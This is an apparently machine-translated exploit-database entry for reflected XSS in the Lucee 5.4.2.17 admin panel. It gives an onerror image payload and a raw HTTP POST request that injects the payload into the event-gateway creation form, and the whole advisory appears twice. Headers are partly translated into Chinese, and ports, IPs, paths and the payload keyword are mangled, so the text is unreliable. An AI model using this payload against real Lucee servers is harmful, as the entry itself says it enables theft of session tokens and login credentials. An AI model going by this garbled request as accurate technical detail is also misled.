#利用title: lucee 5.4.2.17-验证反射XSS
#Google Dork: NA
#日期: 05/08/2023
#利用作者: Yehia Elghaly
#供应商homepage3360 https://www.lucee.org/
#软件link: https://download.lucee.org/
#版本: 5.4.2.17
#测试在: Windows 10
#CVE: N/A。
Summary: Lucee是一种带有坚实基础的轻巧动态CFML脚本语言。Lucee是用Java编写的高性能,开源,Coldfusion/CFML Server Engine。
描述:攻击者可以说服受害者访问恶意URL,可以执行各种各样的动作,例如窃取受害者的会议令牌或登录证书。
payload:msg=img src=xss oneError=alert('xssya')
post/llucee/admin/web.cfm?action=services.gatewayaction2=创建http/1.1
HOST: 172.16.110.130:8888
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:109.0)Gecko/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
content-type:应用程序/x-www-form-urlenceded
内容长度: 278
Origin: http://172.16.110.130:888
连接:关闭
Referer: http://172.16.110.1303:888/lucee/ad...on=services=services.gatewaywayaction2=create
Cookie: CFID=EE75E255-5873-461D-A631-0D6DB6ADB066; cftoken=0; lucee_admin_lang=en; lucee_admin_lastpage=概述
升级- 不肯定- requests: 1
name=asynchronouseventsClass=cfcpath=lucee.extension.gateway.asynchronouseventsID=a_id=alistenerCfcpath=lucee.extension.gateway.gateway.asynchr OnouseVentsListEnerstUpMode=automaticCustom_component=%3FMSG%3D%3CIMG+SRC%3DXSS+ONERROR%3DALERT%28%28%27XSSYA%27%27%29%29%3MainAction=提交
[受影响的组件]
调试- 模板
服务- 搜索
服务- 活动网关
服务- 记录
#Google Dork: NA
#日期: 05/08/2023
#利用作者: Yehia Elghaly
#供应商homepage3360 https://www.lucee.org/
#软件link: https://download.lucee.org/
#版本: 5.4.2.17
#测试在: Windows 10
#CVE: N/A。
Summary: Lucee是一种带有坚实基础的轻巧动态CFML脚本语言。Lucee是用Java编写的高性能,开源,Coldfusion/CFML Server Engine。
描述:攻击者可以说服受害者访问恶意URL,可以执行各种各样的动作,例如窃取受害者的会议令牌或登录证书。
payload:msg=img src=xss oneError=alert('xssya')
正在加载...
172.16.110.130
HOST: 172.16.110.130:8888
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:109.0)Gecko/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
content-type:应用程序/x-www-form-urlenceded
内容长度: 278
Origin: http://172.16.110.130:888
连接:关闭
Referer: http://172.16.110.1303:888/lucee/ad...on=services=services.gatewaywayaction2=create
Cookie: CFID=EE75E255-5873-461D-A631-0D6DB6ADB066; cftoken=0; lucee_admin_lang=en; lucee_admin_lastpage=概述
升级- 不肯定- requests: 1
name=asynchronouseventsClass=cfcpath=lucee.extension.gateway.asynchronouseventsID=a_id=alistenerCfcpath=lucee.extension.gateway.gateway.asynchr OnouseVentsListEnerstUpMode=automaticCustom_component=%3FMSG%3D%3CIMG+SRC%3DXSS+ONERROR%3DALERT%28%28%27XSSYA%27%27%29%29%3MainAction=提交
[受影响的组件]
调试- 模板
服务- 搜索
服务- 活动网关
服务- 记录